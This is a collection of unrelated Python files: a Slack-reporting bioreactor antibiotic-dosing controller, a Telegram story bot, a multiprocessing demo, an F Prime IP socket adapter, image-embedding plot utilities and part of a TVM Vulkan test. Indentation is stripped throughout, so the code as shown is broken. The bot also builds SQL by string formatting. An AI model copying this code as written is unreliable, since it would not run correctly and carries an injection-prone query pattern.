# print(self.recod['file']['shares']['public'][self.chanid][0]['ts'])
self.firstrec = False
else:
slack_client.chat_delete(
channel = self.chanid,
ts = self.recmes['ts']
)
slack_client.chat_delete(
channel = self.chanid,
ts = self.recod['file']['shares']['public'][self.chanid][0]['ts']
)
slack_client.chat_delete(
channel = self.chanid,
ts = self.recodc['file']['shares']['public'][self.chanid][0]['ts']
)
slack_client.chat_delete(
channel = self.chanid,
ts = self.recpu['file']['shares']['public'][self.chanid][0]['ts']
)
slack_client.chat_delete(
channel = self.chanid,
ts = self.rethr['file']['shares']['public'][self.chanid][0]['ts']
)
if self.temp_sensor:
slack_client.chat_delete(
channel = self.chanid,
ts = self.retmp['file']['shares']['public'][self.chanid][0]['ts']
)
self.recmes = slack_client.chat_postMessage(
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
text = ('Elapsed Time: %s ; OD = %.3f' % (self.secondsToText(int(self.elapsed_time.total_seconds())),self.currOD)),
thread_ts = self.recgrats
)
with open("%s/%s/%s/ODplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recod = slack_client.files_upload(
channels = self.chan,
thread_ts = self.recgrats,
title = "ODPlot",
file = file_content
)
with open("%s/%s/%s/ODconc_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recodc = slack_client.files_upload(
channels = self.chan,
thread_ts = self.recgrats,
title = "ODConc",
file = file_content
)
with open("%s/%s/%s/PUplot_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.recpu = slack_client.files_upload(
channels = self.chan,
thread_ts = self.recgrats,
title = "PUPlot",
file = file_content
)
with open("%s/%s/%s/ODthreads_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.rethr = slack_client.files_upload(
channels = self.chan,
thread_ts = self.recgrats,
title = "ODThreads",
file = file_content
)
if self.temp_sensor:
with open("%s/%s/%s/ODtemp_%s.png" % (self.root_dir, self.sysstr, self.start_time, self.start_time), "rb") as file_content:
self.retmp = slack_client.files_upload(
channels = self.chan,
thread_ts = self.recgrats,
title = "ODTemp",
file = file_content
)
except Exception as e:
exc_type, exc_obj, exc_tb = sys.exc_info()
fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
print(exc_type, fname, exc_tb.tb_lineno)
pass
graph_lock[self.sysnum-1] = False
graph_q.pop(0)
self.thread_locks['graphs'].release()
def dynLimit(self):
self.thread_locks['dynL'].acquire()
self.growthOD.append(self.avOD)
self.growthrate_t.append((self.elapsed_time.total_seconds()/3600))
if len(self.growthOD) == self.avefac:
god_temp = np.diff(self.growthOD)/np.diff(self.growthrate_t)
self.growthrate.append(sum(god_temp)/len(god_temp))
self.growthOD.pop(0)
if len(self.growthrate) < self.avefac:
self.growthrate_t.pop(0)
if len(self.growthrate) == self.avefac:
gr_temp = np.diff(self.growthrate)/np.diff(self.growthrate_t)
self.growthrate2.append(sum(gr_temp)/len(gr_temp))
self.growthrate.pop(0)
self.growthrate_t.pop(0)
if len(self.growthrate2) == self.avefac:
self.instant_gr = sum(god_temp)/len(god_temp)
self.instant_gr2 = sum(gr_temp)/len(gr_temp)
self.growthrate2.pop(0)
if self.instant_gr > self.OD_err and self.instant_gr2 < 0.01:
self.OD_thr_set = True
self.OD_min = self.avOD
self.OD_thr = self.OD_min*1.25
self.thread_locks['dynL'].release()
def control_alg(self):
print_buffer = 0
# id = str(self.sysnum)+'CA'
# i2c_q.append(id)
# while i2c_q[0] is not id:
# time.sleep(0.1)
# print_buffer += 1
# if print_buffer % 10 == 0: print ('[%s] {CAlg} Waiting for Locks...' % self.sysstr)
# if i2c_q[0] is id:
# i2c_lock[self.sysnum-1] = True
# time.sleep(0.05)
try:
global slack_client
if self.pipins:
GPIO.setmode(GPIO.BCM)
for pin in self.pin_list:
GPIO.setup(pin, GPIO.OUT)
else:
self.pins = [None]*(max(self.pin_list)+1)
self.mcp = self.gpioe[self.gpio_add.index(self.config[self.sysstr].getint('m_address'))]
for pin in self.pin_list:
self.pins[pin] = self.mcp.get_pin(pin)
self.pins[pin].direction = digitalio.Direction.OUTPUT
self.pins[pin].value = False
if self.avOD > self.OD_min:
self.pump_on(self.P_waste_pins)
time.sleep(self.P_waste_times)
self.pump_off(self.P_waste_pins)
self.waste = 3
self.drug_mass = self.drug_mass - (self.drug_mass/12)
if self.avOD > self.OD_thr and self.avOD > self.last_dilutionOD:
print('[%s] OD Threshold exceeded, pumping cefepime' % self.sysstr)
self.pump_on(self.P_drug_pins)
time.sleep(self.P_drug_times)
self.pump_off(self.P_drug_pins)
self.drug = 2
self.drug_mass = self.drug_mass + 2.5
slack_client.chat_postMessage(
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "OD = %0.3f, pumping cefepime. Cefepime concentration: %f ug/mL" % (self.avOD, (self.drug_mass)/12)
)
else:
print('[%s] OD below threshold, pumping nutrient' % self.sysstr)
self.pump_on(self.P_nut_pins)
time.sleep(self.P_nut_times)
self.pump_off(self.P_nut_pins)
self.nut = 1
slack_client.chat_postMessage(
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "OD = %0.3f, pumping nutrient. Cefepime concentration: %f ug/mL" % (self.avOD, (self.drug_mass)/12)
)
else: #report even when pumps aren't activated yet
# self.drug_mass = 0 if self.drug_mass < 0
slack_client.chat_postMessage(
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "OD = %0.3f, OD below nutrient pump threshold." % (self.avOD)
)
except Exception as e:
print ('[%s] CA - WARNING ADC REQUEST CRASHED' % self.sysstr)
print(e)
pass
self.last_dilutionOD = self.avOD
# i2c_lock[self.sysnum-1] = False
# i2c_q.pop(0)
self.thread_locks['control_alg'].release()
def secondsToText(self,secs):
if secs:
days = secs//86400
hours = (secs - days*86400)//3600
minutes = (secs - days*86400 - hours*3600)//60
seconds = secs - days*86400 - hours*3600 - minutes*60
result = ("{0} day{1}, ".format(days, "s" if days!=1 else "") if days else "") + \
("{0} hour{1}, ".format(hours, "s" if hours!=1 else "") if hours else "") + \
("{0} minute{1}, ".format(minutes, "s" if minutes!=1 else "") if minutes else "") + \
("{0} second{1}, ".format(seconds, "s" if seconds!=1 else "") if seconds else "")
return result[:-2]
else:
return "0 seconds"
def on_timer(self):
global slack_client
self.loops += 1
if self.loops < self.total_time/self.time_between_ODs:
threading.Timer(self.time_between_ODs,self.on_timer).start()
else:
self.now = datetime.now()
self.nows = time.time()
print('[%s] Experiment Complete at %02s:%02s:%02s ' % (self.sysstr, self.now.hour, self.now.minute, self.now.second))
# GPIO.output(P_fan_pins,0)
slack_client.chat_postMessage(
channel = self.chan,
username=self.sysstr,
icon_url = self.slack_usericon,
thread_ts = self.threadts,
text = "Experiment Complete at %02s:%02s:%02s " % (self.now.hour, self.now.minute, self.now.second)
)
if self.loops > 1:
if not self.thread_locks['threads'].locked():
self.threads['threads'] = threading.Thread(target=self.thread_split())
self.threads['threads'].start()
else:
self.threads['threads'] = threading.Thread(target=self.thread_split())
self.threads['threads'].start()
def thread_split(self):
self.thread_locks['threads'].acquire()
self.now = datetime.now()
self.nows = time.time()
#print(self.loops)
self.elapsed_time = self.now - self.start_time
self.active_threads = threading.active_count()
# Count see if the thread is locked for a long time
global i2c_q
if self.loops > 1:
if not self.thread_locks['adc'].locked():
self.thread_locks['adc'].acquire()
i2c_q.append(str(self.sysnum-1)+'OD')
if not self.thread_locks['dynL'].locked():
if (self.loops % int(self.thresh_check*60/self.time_between_ODs)) == 0 and not self.OD_thr_set:
self.threads['dynL'] = threading.Thread(target=self.dynLimit)
self.threads['dynL'].start()
if not self.thread_locks['control_alg'].locked():
if self.loops % (self.loops_between_pumps) == 0:
self.thread_locks['control_alg'].acquire()
i2c_q.append(str(self.sysnum-1)+'CA')
if not self.thread_locks['graphs'].locked():
if (self.loops % int(self.time_between_graphs*60/self.time_between_ODs)) == 0:
self.threads['graphs'] = threading.Thread(target=self.graphOD)
self.threads['graphs'].start()
else:
self.thread_locks['adc'].acquire()
i2c_q.append(str(self.sysnum-1)+'OD')
if (self.loops % int(self.thresh_check*60/self.time_between_ODs)) == 0 and not self.OD_thr_set:
self.threads['dynL'] = threading.Thread(target=self.dynLimit)
self.threads['dynL'].start()
if self.loops % (self.loops_between_pumps) == 0:
self.thread_locks['control_alg'].acquire()
i2c_q.append(str(self.sysnum-1)+'CA')
if (self.loops % int(self.time_between_graphs*60/self.time_between_ODs)) == 0:
self.threads['graphs'] = threading.Thread(target=self.graphOD)
self.threads['graphs'].start()
# save the data to disk if it's time
if (self.loops % int(self.time_between_saves*60/self.time_between_ODs)) == 0:
if self.printing:
print('[%s] Saving to disk' % self.sysstr)
self.threads['save'] = threading.Thread(target=self.savefunc)
self.threads['save'].start()
else:
if self.printing:
print('[%s] Buffering Data' % self.sysstr)
self.threads['buffer'] = threading.Thread(target=self.bufferdata)
self.threads['buffer'].start()
if self.printing:
print ('[%s] Elapsed Time: %s ; Threads = %d ; OD = %.3f' % (self.sysstr, self.secondsToText(int(self.elapsed_time.total_seconds())),self.active_threads,self.currOD))
self.thread_locks['threads'].release()
chips = IC_init()
threading.Thread(target = i2c_controller).start()
threading.Thread(target = temp_runner).start()
eve_starter()
Process(target = live_plotter).start()
# threading.Thread(target = slackresponder).start()
|
jentu.py
|
# -*- encoding: utf-8 -*-
from multiprocessing import Process, Queue
from signal import signal, SIGINT
from random import randint
from settings import *
import telebot
import sqlite3
import json
import time
# import os
#################
## Threading ##
#################
def signal_ctrl(signal, frame):
print("You pressed Ctrl+C!\nShutdown broadcasting...")
exit(0)
def broadcasting(jobs, ready):
#info("Broadcasting")
signal(SIGINT, signal_ctrl)
timer = 0
while True:
timer = time.time()
temp_list = []
while not jobs.empty():
task = jobs.get()
if(timer-task[0] >= 2.0):
if(task[0] < 1.0):
answer_markup = telebot.types.ReplyKeyboardRemove()
else:
answer_markup = None
message = task[3][0]
del task[3][0]
task[0] = time.time()
if task[3]:
temp_list.append(task)
elif task[4]:
answer_markup = telebot.types.ReplyKeyboardMarkup(True, True)
for edge in task[4]:
answer_markup.row(edge[2])
if(message[0] == 't'):
bot.send_message(task[1], message[1], reply_markup=answer_markup, disable_notification=True, parse_mode="Markdown")
elif(message[0] == 'i'):
bot.send_photo(task[1], message[1], reply_markup=answer_markup, disable_notification=True)
ready.put(task[2])
break
else:
temp_list.append(task)
for job in temp_list:
jobs.put(job)
delta = 0.025 - time.time() + timer
if(delta > 0.0):
time.sleep(delta)
#################
## Main-only ##
#################
if __name__ == '__main__':
# Game Data
story = []
users = {}
tasks = Queue()
user_states = Queue()
# Connect SQLite
dataDB = sqlite3.connect('data.db', check_same_thread=False)
dataEX = dataDB.cursor()
# Loading Story
dataEX.execute("SELECT * FROM answer ORDER BY id")
dataDB.commit()
for row in dataEX:
story.append(json.loads(row[1]))
#print(story[0][1][1][2])
# Loading Users
dataEX.execute("SELECT * FROM users WHERE id != 0")
dataDB.commit()
print("USERS:")
for row in dataEX:
users[row[0]] = [row[1], row[2], True]
print("-> user", row[0], "-----", users[row[0]])
# SQLite Functions
def new_user(message):
dataEX.execute("""
INSERT INTO users (id, save, archivement)
SELECT {0}, {1}, '{2}' FROM users
WHERE NOT EXISTS (SELECT 1 FROM users WHERE id = {0} LIMIT 1)
LIMIT 1""".format(str(message.from_user.id), '0', '[]'))
dataDB.commit()
users[message.from_user.id] = [0,'[]',True]
#users[row[0]] = [row[1], row[2]]
#usersEX.execute('CREATE TABLE users (id INTEGER NOT NULL PRIMARY KEY, save INTEGER NOT NULL, archivement TEXT)')
# Debug logging
def log(info, message):
print("\n______________________________________LOG______________________________________")
print("From: {0} {1}; Info: {2}".format(message.from_user.first_name, message.from_user.last_name, info))
print("Text: " + message.text)
print("_______________________________________________________________________________")
#################
## TeleBot ##
#################
# Initialize TeleBot
bot = telebot.TeleBot(drink(vodka))
# Start session
@bot.message_handler(commands=['start'])
def send_welcome(message):
new_user(message)
users[message.from_user.id][2] = False
tasks.put([0.0, message.chat.id, message.from_user.id, story[0][2], story[0][1]])
log("START", message)
# Stop
@bot.message_handler(commands=['stop'])
def send_wtf(message):
stop_markup = telebot.types.ReplyKeyboardRemove()
bot.reply_to(message, "WTF?! NO!", reply_markup=stop_markup)
log("STOP", message)
# Parsing Text
@bot.message_handler(content_types=['text'])
def send_answer(message):
if(message.text == "kekos"):
bot.reply_to(message, "privetos")
if(message.from_user.id in users):
bot.send_message(message.chat.id, "Oh, I know who are you!")
else:
user_id = message.from_user.id
answer_id = message.chat.id
okay = False
if(not users[user_id][2]):
while not user_states.empty():
user_id = user_states.get()
users[user_id][2] = True
if(user_id == message.from_user.id):
okay = True
break
else:
okay = True
if(okay):
wrong = True
for edge in story[users[user_id][0]][1]:
if(message.text == edge[2]):
users[user_id][0] = edge[0]
users[user_id][2] = False
wrong = False
tasks.put([0.0, answer_id, user_id, story[edge[0]][2], story[edge[0]][1]])
break
if(wrong):
bot.send_message(answer_id, "Хм.. что-то пошло не так!")
log("TEXT", message)
################
## MAIN ##
################
if __name__ == '__main__':
broad = Process(target=broadcasting, args=(tasks, user_states))
broad.start()
print("JentuBot started! <-> ['Ctrl+C' to shutdown]")
bot.polling(none_stop=True, interval=0)
# def info(title):
# print("!#", title, "...")
# print("... working on process:", os.getpid(), "<=> Parent:", os.getppid())
|
process_queue.py
|
###################################
# File Name : process_queue.py
###################################
#!/usr/bin/python3
import time
import multiprocessing
def set_data(q):
p = multiprocessing.current_process()
msg = "Hello World"
q.put(msg)
print ("[%s] set queue data : %s" % (p.name, msg))
def get_data(q):
time.sleep(1)
p = multiprocessing.current_process()
print ("[%s] get queue data : %s" % (p.name, q.get()))
def main():
queue = multiprocessing.Queue()
p1 = multiprocessing.Process(name="set_data", target=set_data, args=(queue,))
p1.start()
p2 = multiprocessing.Process(name="get_data", target=get_data, args=(queue,))
p2.start()
p1.join()
p2.join()
if __name__ == "__main__":
main()
|
ip.py
|
import time
import logging
import socket
import threading
import fprime_gds.common.adapters.base
import fprime_gds.common.logger
LOGGER = logging.getLogger("ip_adapter")
class IpAdapter(fprime_gds.common.adapters.base.BaseAdapter):
"""
Adapts IP traffic for use with the GDS ground system. This serves two different "servers" both on the same address
and port, but one uses TCP and the other uses UDP. Writes go to the TCP connection, and reads request data from
both. This data is concatenated and returned up the stack for processing.
"""
KEEPALIVE_INTERVAL = 0.500 # Interval to send a KEEPALIVE packet. None will turn off KEEPALIVE.
KEEPALIVE_DATA = b"sitting well" # Data to send out as part of the KEEPALIVE packet. Should not be null nor empty.
def __init__(self, sender, address, port):
"""
Initialize this adapter by creating a handler for UDP and TCP. A thread for the KEEPALIVE application packets
will be created, if the interval is not none.
"""
super(IpAdapter, self).__init__(sender)
self.keepalive = None
self.running = True
self.tcp = TcpHandler(address, port)
self.udp = UdpHandler(address, port)
# Keep alive thread
try:
if IpAdapter.KEEPALIVE_INTERVAL is not None:
self.keepalive = threading.Thread(target=self.run, args=[float(self.KEEPALIVE_INTERVAL)]).start()
except (ValueError, TypeError) as exc:
LOGGER.error("Failed to start keep-alive thread. {}: {}".format(type(exc).__name__, str(exc)))
def open(self):
"""
Open up the interface to the stored Address and Port. This will create a TCP and UDP socket. The TCP socket will
be bound to the address, and listened to for incoming connects.
"""
self.tcp.open()
self.udp.open()
def close(self):
"""
Close the TCP and UDP sockets.
"""
self.tcp.close()
self.udp.close()
def write(self, frame):
"""
Send a given framed bit of data by sending it out the serial interface. It will attempt to reconnect if there is
was a problem previously. This function will return true on success, or false on error.
:param frame: framed data packet to send out
:return: True, when data was sent through the UART. False otherwise.
"""
return self.tcp.write(frame)
def read(self, _):
"""
Read up to a given count in bytes from the TCP adapter. This may return less than the full requested size but
is expected to return some data.
:param _: upper bound of data requested, unused with IP connections
:return: data successfully read
"""
return self.tcp.read() + self.udp.read()
def run(self, interval):
"""
Run this thread in order to accept incoming connections and spiral them off into another thread for handling the
given client.
"""
while self.running:
self.write(IpAdapter.KEEPALIVE_DATA)
time.sleep(interval)
@classmethod
def get_arguments(cls):
"""
Returns a dictionary of flag to argparse-argument dictionaries for use with argparse to setup arguments.
:return: dictionary of flag to argparse arguments for use with argparse
"""
return {
("-a", "--address"):{
"dest":"address",
"type":str,
"default":"0.0.0.0",
"help":"Address of the IP adapter server. Default: %(default)s"
},
("-p", "--port"): {
"dest":"port",
"type":int,
"default": 50000,
"help":"Port of the IP adapter server. Default: %(default)s"
}
}
class IpHandler(object):
"""
Base handler for IP types. This will provide the basic methods, and synchronization for reading/writing to multiple
child implementations, namely: UDP and TCP. These child objects can then be instantiated individually.
"""
IP_SOCKET_TIMEOUT = 0.001 # Timeout applied to the socket
ERROR_RETRY_INTERVAL = 1 # Seconds between a non-timeout error and a socket reconnection
MAX_CLIENT_BACKLOG = 1 # One client backlog, allowing for reconnects
# Connection states, it will go between these states
CONNECTING = "CONNECTING"
CONNECTED = "CONNECTED"
CLOSED = "CLOSED"
def __init__(self, address, port, type, server=True, logger=logging.getLogger("ip_handler")):
"""
Initialize this handler. This will set the variables, and start up the internal receive thread.
:param address: address of the handler
:param port: port of the handler
:param type: type of this adapter. socket.SOCK_STREAM or socket.SOCK_DGRAM
"""
self.type = type
self.address = address
self.next_connect = 0
self.port = port
self.socket = None
self.server = server
self.lock = threading.Lock()
self.connected = IpHandler.CLOSED
self.logger = logger
def open(self):
"""
Open up this IP type adapter. Returning if already connected.
"""
if self.CONNECTED == self.connected:
return True
# If a server, just continually try and reconnect. Otherwise, just try once.
while True:
try:
with self.lock:
# Prevent reconnects when the socket is connected. Socket should be closed on all errors
if self.connected == IpHandler.CLOSED and self.next_connect < time.time():
self.connected = IpHandler.CONNECTING
self.socket = socket.socket(socket.AF_INET, self.type)
if self.server:
self.socket.bind((self.address, self.port))
else:
self.socket.connect((self.address, self.port))
self.socket.settimeout(IpHandler.IP_SOCKET_TIMEOUT)
self.open_impl()
self.connected = IpHandler.CONNECTED
self.logger.info("{} connected to {}:{}"
.format("Server" if self.server else "Client", self.address, self.port))
# All errors (timeout included) we should close down the socket, which sets self.connected
except socket.error as exc:
if type(exc) != socket.timeout:
self.logger.warning("Failed to open socket at {}:{}, retrying: {}: {}"
.format(self.address, self.port, type(exc).__name__, str(exc)))
self.next_connect = time.time() + IpHandler.ERROR_RETRY_INTERVAL
self.close()
# Check ending condition of loop
with self.lock:
if not self.server or self.CONNECTED == self.connected:
break
# Connection established, run post open
if self.CONNECTED == self.connected:
self.post_open()
return self.connected == self.CONNECTED
def close(self):
"""
Close this specific IP handler. This involves setting connected to False, and closing non-null sockets.
"""
with self.lock:
try:
self.close_impl()
if self.socket is not None:
self.socket.close()
self.socket = None
finally:
self.connected = IpHandler.CLOSED
def post_open(self):
"""Post opening step"""
pass
def read(self):
"""
Reads a single message after ensuring that the socket is fully open. On a non-timeout error, close the socket in
preparation for a reconnect. This internally will call the child's read_impl
:return: data read from TCP server or b"" when nothing is available
"""
# Open if not already open, on failure return b""
if self.open():
# This will block waiting for data
try:
with self.lock:
return self.read_impl()
except socket.timeout:
pass
except socket.error as exc:
self.close()
self.logger.warning("Read failure attempting reconnection. {}: ".format(type(exc).__name__, str(exc)))
self.open()
return b""
def write(self, message):
"""
Writes a single message after ensuring that the socket is fully open. On any error, close the socket in
preparation for a reconnect. This internally will call the child's write_impl
:param message: message to send
:return: True if all data was written, False otherwise
"""
# Open if not already open, on failure return b""
if self.open():
# This will block waiting for data
try:
with self.lock:
self.write_impl(message)
return True
except socket.error as exc:
self.close()
self.logger.warning("Write failure, reconnecting. {}: ".format(type(exc).__name__, str(exc)))
self.open()
return False
class TcpHandler(IpHandler):
"""
An IpAdapter that allows for interfacing with TCP socket.
"""
def __init__(self, address, port, server=True, logger=logging.getLogger("tcp_handler")):
"""
Init the TCP adapter with port and address
:param address: address of TCP
:param port: port of TCP
"""
super(TcpHandler, self).__init__(address, port, socket.SOCK_STREAM, server, logger)
self.client = None
self.client_address = None
def open_impl(self):
"""
Open up this particular adapter. This adapter
"""
# When a server, must accept and spawn new socket
if self.server:
self.socket.listen(IpHandler.MAX_CLIENT_BACKLOG)
(self.client, self.client_address) = self.socket.accept()
self.client.settimeout(IpHandler.IP_SOCKET_TIMEOUT)
# When a client, use normal socket
else:
self.client = self.socket
def close_impl(self):
"""
Close the TCP socket that was spawned as appropriate.
"""
if self.client is not None:
self.client.close()
self.client = None
self.client_address = None
def read_impl(self):
"""
Specific read implementation for the TCP handler. This involves reading from the spawned client socket, not the
primary socket.
"""
data = self.client.recv(IpAdapter.MAXIMUM_DATA_SIZE)
return data
def write_impl(self, message):
"""
Send is implemented with TCP. It will send it to the connected client.
:param message:
:return:
"""
self.client.sendall(message)
class UdpHandler(IpHandler):
"""
Handler for UDP traffic. This will work in unison with the TCP adapter.
"""
def __init__(self, address, port, server=True, logger=logging.getLogger("udp_handler")):
"""
Init UDP with address and port
:param address: address of UDP
:param port: port of UDP
"""
super(UdpHandler, self).__init__(address, port, socket.SOCK_DGRAM, server, logger)
def open_impl(self):
"""No extra steps required"""
pass
def close_impl(self):
"""No extra steps required"""
pass
def read_impl(self):
"""
Receive from the UDP handler. This involves receiving from an unconnected socket.
"""
(data, address) = self.socket.recvfrom(IpAdapter.MAXIMUM_DATA_SIZE)
return data
def write_impl(self, message):
"""
Write not implemented with UDP
"""
raise NotImplementedError("UDP Handler cannot send data.")
|
vc_toolbox.py
|
import os
import numpy as np
from io import BytesIO
import PIL.Image
from IPython import display
from scipy.spatial.distance import cdist
import scipy.ndimage
import lap # pip install lap
import umap
from math import floor, sqrt, ceil
import copy
import torch as t
import torchvision as tv
import torch.nn as nn
from tqdm import tqdm
import threading
from queue import Queue
def load_img(file):
return PIL.Image.open(file).convert('RGB')
def from_device(tensor):
return tensor.detach().cpu().numpy()
# Show an image within a Jupyter environment
# Can do PyTorch tensors, NumPy arrays, file paths, and PIL images
def show_img(img, fmt='jpeg', normalize=False):
if type(img) is np.ndarray:
img = PIL.Image.fromarray(img)
elif type(img) is t.Tensor:
img = _deprocess(img, normalize)
elif type(img) is str or type(img) is np.str_:
img = PIL.Image.open(img)
out = BytesIO()
img.save(out, fmt)
display.display(display.Image(data=out.getvalue()))
# Save an image
# Can do PyTorch tensors, NumPy arrays, file paths, and PIL images
def save_img(img, filename, normalize=False):
if type(img) is np.ndarray:
img = PIL.Image.fromarray(img)
elif type(img) is t.Tensor:
img = _deprocess(img, normalize)
elif type(img) is str or type(img) is np.str_:
img = PIL.Image.open(img)
img.save(filename)
# Reverse of preprocess, PyTorch tensor to PIL image
def _deprocess(tensor, normalize):
# Clone tensor first, otherwise we are NOT making a copy by using .cpu()!
img = t.clone(tensor)
img = img.cpu().data.numpy().squeeze() # Get rid of batch dimension
img = img.transpose((1, 2, 0)) # Channels first to channels last
if normalize:
mean = np.array([0.485, 0.456, 0.406])
std = np.array([0.229, 0.224, 0.225])
img = std * img + mean
# 0./1. range to 0./255. range
img *= 255
img = img.astype(np.uint8)
img = PIL.Image.fromarray(img)
return img
def _smart_resize(img, thumb_size):
max_dim = np.argmax(img.size)
scale = thumb_size/img.size[max_dim]
new_size = (int(img.size[0]*scale), int(img.size[1]*scale))
img = img.resize(new_size, PIL.Image.ANTIALIAS)
return img
def get_all_files(folder, extension=None):
all_files = []
for root, dirs, files in os.walk(folder):
for file in files:
if extension and file.endswith(extension) or extension is None:
try:
img = PIL.Image.open(os.path.join(root, file)) # If PIL can't open it we don't want it
all_files.append(f'{root}/{file}')
except:
continue
return all_files
def new_dir(folder):
if not os.path.exists(folder): os.makedirs(folder)
def plot_features(files, features, num_datapoints=None, thumb_size=32, thumbs=None, num_workers=32, html=False, grid=False):
if num_datapoints is None:
assert features.shape[0] == len(files)
num_datapoints = len(files)
if grid:
print('Computing grid')
# https://gist.github.com/vmarkovtsev/74e3a973b19113047fdb6b252d741b42
# https://github.com/gatagat/lap
gs = floor(sqrt(features.shape[0]))
samples = gs*gs # Determine number of data points to keep
print(f'Grid size: {gs}x{gs}, samples: {samples}')
# Cut excess data points
files = files[:samples]
features = features[:samples]
# Make grid
grid = np.dstack(np.meshgrid(np.linspace(0, 1, gs), np.linspace(0, 1, gs))).reshape(-1, 2)
cost_matrix = cdist(grid, features, "sqeuclidean").astype(np.float32)
cost, row_asses, col_asses = lap.lapjv(cost_matrix)
features = grid[col_asses]
if html:
html_map = []
# Generate thumbnails
if thumbs is None:
print('Generating thumbnails in parallel')
thumbs = _thumbnails_parallel(files, thumb_size, num_workers)
# Find max. and min. feature values
value_max = np.max(features)
value_min = np.min(features)
# Determine max possible grid size
gs = thumb_size * floor(sqrt(num_datapoints))
# Calculate size of the plot based on these values
canvas_size = int((abs(value_max) + abs(value_min)) * gs) + thumb_size # Images are anchored at upper left corner
# Define plot as empty (white) canvas
canvas = np.ones((canvas_size, canvas_size, 3), dtype=np.uint8) * 255
print('Plotting image')
for i, file in enumerate(files):
img = thumbs[file]
# Read features and calculate x,y
y = int((features[i,0] + abs(value_min)) * gs)
x = int((features[i,1] + abs(value_min)) * gs)
# Plot image
canvas[y:y+img.shape[0],x:x+img.shape[1],:] = img
if html:
# Add to HTML map area list
mapstring = f'<area shape="rect" coords="{x},{y},{x + img.shape[1]},{y + img.shape[0]}" href="{files[i]}" alt=""/>'
html_map.append(mapstring)
if html:
# Return plot and HTML map area list
print('Writing HTML map')
return canvas, html_map, thumbs
else:
return canvas, thumbs
def _thumbnails_parallel(files, thumb_size, num_workers):
d = dict()
q = Queue()
l = threading.Lock()
def _worker(thumb_size, d):
while True:
file = q.get()
d[file] = np.array(_smart_resize(load_img(file), thumb_size))
q.task_done()
for i in range(num_workers):
t = threading.Thread(target=_worker, args=(thumb_size,d,))
t.daemon = True # Thread dies when main thread (only non-daemon thread) exits.
t.start()
for file in files:
q.put(file)
q.join()
return d
class UnsupervisedImageDataset(t.utils.data.Dataset):
def __init__(self, folder, extension=None, transforms=None):
self.folder = folder
self.transforms = transforms
self.files = get_all_files(folder, extension)
def __len__(self):
return len(self.files)
def __getitem__(self, idx):
if t.is_tensor(idx):
idx = idx.tolist()
sample = load_img(self.files[idx])
if self.transforms:
sample = self.transforms(sample)
return sample
def train_model(model, dataloaders, criterion, optimizer, device, epochs):
best_model_wts = copy.deepcopy(model.state_dict())
best_acc = 0.0
for epoch in range(epochs):
print(f'Epoch {epoch}/{epochs-1}')
print('-' * 10)
# Each epoch has a training and validation phase
for phase in ['train', 'val']:
if phase == 'train':
model.train() # Set model to training mode
else:
model.eval() # Set model to evaluate mode
running_loss = 0.0
running_corrects = 0
# Iterate over data.
for inputs, labels in dataloaders[phase]:
inputs = inputs.to(device)
labels = labels.to(device)
# Zero the parameter gradients
optimizer.zero_grad()
# Forward
# Track history if only in train
with t.set_grad_enabled(phase == 'train'):
outputs = model(inputs)
_, preds = t.max(outputs, 1)
loss = criterion(outputs, labels)
# backward + optimize only if in training phase
if phase == 'train':
loss.backward()
optimizer.step()
# Statistics
running_loss += loss.item() * inputs.size(0)
running_corrects += t.sum(preds == labels.data)
epoch_loss = running_loss / len(dataloaders[phase].dataset)
epoch_acc = running_corrects.double() / len(dataloaders[phase].dataset)
print(f'{phase} loss: {epoch_loss:.4f} Acc: {epoch_acc:.4f}')
# Deep copy the model
if phase == 'val' and epoch_acc > best_acc:
best_acc = epoch_acc
best_model_wts = copy.deepcopy(model.state_dict())
print(f'Best val acc: {best_acc:4f}')
# Load best model weights
model.load_state_dict(best_model_wts)
return model
|
test_target_codegen_vulkan.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import random
import re
import threading
import numpy as np
import pytest
import tvm
import tvm.testing
from tvm import relay, te
from tvm.topi.math import cast
def randint_loguniform(low=1, high=32768, size=None):
logN = np.random.uniform(low=np.log(low), high=np.log(high), size=size)
N = np.exp(logN).astype(int)
return np.unique(N)
dtype = tvm.testing.parameter("float32", "int32", "float16", "int8")
fuzz_arr_size = tvm.testing.parameter(*randint_loguniform(size=25))
# Explicitly specify a target, as this test is looking at the
# generated shader code, and is not running on an actual device.
@tvm.testing.parametrize_targets(
" ".join(
[
"vulkan",
"-supports_int8=1",
"-supports_8bit_buffer=1",
"-supports_storage_buffer_storage_class=1",
"-supports_float16=1",
"-supports_16bit_buffer=1",
]
)
)
def test_vector_comparison(target, dtype):
n = (1024,)
A = te.placeholder(n, dtype=dtype, name="A")
B = te.compute(
A.shape,
lambda i: tvm.tir.Select(
A[i] >= 0, A[i] + tvm.tir.const(1, dtype), tvm.tir.const(0, dtype)
),
name="B",
)
s = te.create_schedule(B.op)
(bx, tx) = s[B].split(s[B].op.axis[0], factor=128)
(tx, vx) = s[B].split(tx, factor=4)
s[B].bind(bx, te.thread_axis("blockIdx.x"))
s[B].bind(tx, te.thread_axis("threadIdx.x"))
s[B].vectorize(vx)
f = tvm.build(s, [A, B], target)
# Verify we generate the boolx4 type declaration and the OpSelect
# v4{float,half,int} instruction
assembly = f.imported_modules[0].get_source()
matches = re.findall("%v4bool = OpTypeVector %bool 4", assembly)
assert len(matches) == 1
matches = re.findall("OpSelect %v4.*", assembly)
assert len(matches) == 1
